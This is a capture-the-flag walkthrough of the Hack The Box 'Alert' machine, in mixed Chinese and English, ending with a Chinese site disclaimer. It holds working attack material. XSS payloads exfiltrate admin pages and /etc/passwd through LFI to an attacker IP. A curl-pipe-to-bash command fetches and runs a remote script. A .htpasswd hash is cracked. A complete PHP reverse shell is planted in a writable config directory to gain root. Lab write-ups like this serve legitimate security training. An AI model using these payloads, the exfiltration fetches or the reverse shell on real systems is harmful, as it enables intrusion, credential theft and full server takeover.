Information Gathering

$ nmap -p- 10.10.11.44 --min-rate 1000 -sC -sV

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_  256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp    open     http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://alert.htb/
12227/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.75 seconds

HTTP XSS && LFI && CSRF

# echo '10.10.11.44 alert.htb' >> /etc/hosts

将有效负载发送给联系人管理员

别往兔子洞里钻，这里有个洞。所以我们需要得到管理页面。

Paylaod = >

<script>fetch("http://alert.htb/index.php?page=contact").then(res=>res.text()).then(data=>fetch("http://10.10.16.6?file="+encodeURIComponent(data)));</script>

email=1%40gmail.com&message=http%3A%2F%2Falert.htb%2Fvisualizer.php%3Flink_share%3D678a3462ccda42.72581073.md

<script>fetch("http://alert.htb/index.php?page=messages").then(res=>res.text()).then(data=>fetch("http://10.10.16.6?file="+encodeURIComponent(data)));</script>

messages.php?file=2024-03-10_15-48-34.txt

<script>fetch("http://alert.htb/messages.php?file=2024-03-10_15-48-34.txt").then(res=>res.text()).then(data=>fetch("http://10.10.16.6?file="+encodeURIComponent(data)));</script>

什么也没有..

<script>fetch("http://alert.htb/messages.php?file=../../../../../../../etc/passwd").then(res=>res.text()).then(data=>fetch("http://10.10.16.6?file="+encodeURIComponent(data)));</script>

email=1%40gmail.com&message=http%3a//alert.htb/visualizer.php%3flink_share%3d678a38139143b3.63679590.md

It's too troublesome. It seems that an automated script is needed...

AlertShot-htb

https://github.com/MartinxMax/ALTS-HTB

$ python alts.py

输入反向IP，端口

Enter reverse IP address: 10.10.16.6
File path >/etc/passwd

Apache .htpasswd && Hash Crack

File path >/etc/apache2/apache2.conf

$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://alert.htb -H "Host:FUZZ.alert.htb" -ac

File path >/var/www/statistics.alert.htb/.htpasswd

$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long hash

$ ssh [email protected]

User.txt

50e1a4a0b90d1af9ad0d813d11fc1203

Privilege Escalation

albert@alert:~$ curl http://10.10.16.6/linpeas.sh|bash

albert@alert:/opt/website-monitor$ ps -aux

确认该环境被部署在服务器

并且当前用户所属management组,可对config新增文件

<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.16.6';  // CHANGE THIS
$port = 10011;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is end down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?> 

albert@alert:/opt/website-monitor/config$ wget http://10.10.16.6/rev.php

email=1%40gmail.com&message=http%3a//127.0.0.1%3a8080/config/rev.php

通过之前的提交页面触发载荷。

Root.txt

b5f961158dcd6099a11f0947183ccc4b

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）